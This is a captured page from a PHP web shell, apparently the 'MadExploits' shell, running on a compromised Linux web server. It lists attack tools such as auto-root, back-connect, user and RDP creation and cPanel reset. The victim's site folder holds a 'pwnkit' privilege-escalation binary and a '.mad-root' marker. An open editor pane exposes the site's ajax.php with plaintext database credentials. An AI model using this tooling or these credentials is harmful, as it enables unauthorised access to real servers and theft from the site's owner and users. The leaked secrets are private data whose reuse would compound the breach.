Linux server-604606.appsiete.com 3.10.0-1160.139.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Nov 3 13:30:41 UTC 2025 x86_64
Apache
: 162.240.172.200 | : 216.73.216.32
14 Domain
7.3.33
gujo45me
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
gujo45me /
public_html /
consultacpe /
php /
[ HOME SHELL ]
Name
Size
Permission
Action
classes
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
ajax.php
1.51
KB
-rw-r--r--
ajax2.php
1.25
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ajax.php
<?php error_reporting(E_ALL ^ E_NOTICE); require "classes/DB.class.php"; require "classes/SevenBase.class.php"; require "classes/Seven.class.php"; require "classes/SevenComprobante.class.php"; require "classes/SevenRegistrar.class.php"; if(get_magic_quotes_gpc()){ // If magic quotes is enabled, strip the extra slashes array_walk_recursive($_GET,create_function('&$v,$k','$v = stripslashes($v);')); array_walk_recursive($_POST,create_function('&$v,$k','$v = stripslashes($v);')); } /* Database Configuration. Add your details below */ $dbOptions = array( 'db_host' => 'localhost', 'db_name' => 'gujo45me_consultacpe', 'db_user' => 'gujo45me_seven', 'db_pass' => '3owTCLTvNLw' ); /* Database Config End */ try{ $res = array(); DB::init($dbOptions); $res = Seven::getEmpresa($_POST['ruc_empresa']); if ($res['msg']) { DB::selectDataBase($res['msg'][0]->nombre_bd); $response = array(); switch($_GET['action']){ case 'getComprobantes': $response = Seven::getComprobantes($_POST['numero_documento']); break; case 'getComprobante': $response = Seven::getComprobante($_POST['numero_documento'], $_POST['nombre_comprobante']); $response['dominio'] = $res['msg'][0]->subdominio; $response['servidor'] = $res['msg'][0]->servidor; break; default: throw new Exception('Wrong action'); } echo json_encode($response); } else{ echo json_encode(array('msg' => "error")); } } catch(Exception $e){ die(json_encode(array('error' => $e->getMessage()))); } ?>
Close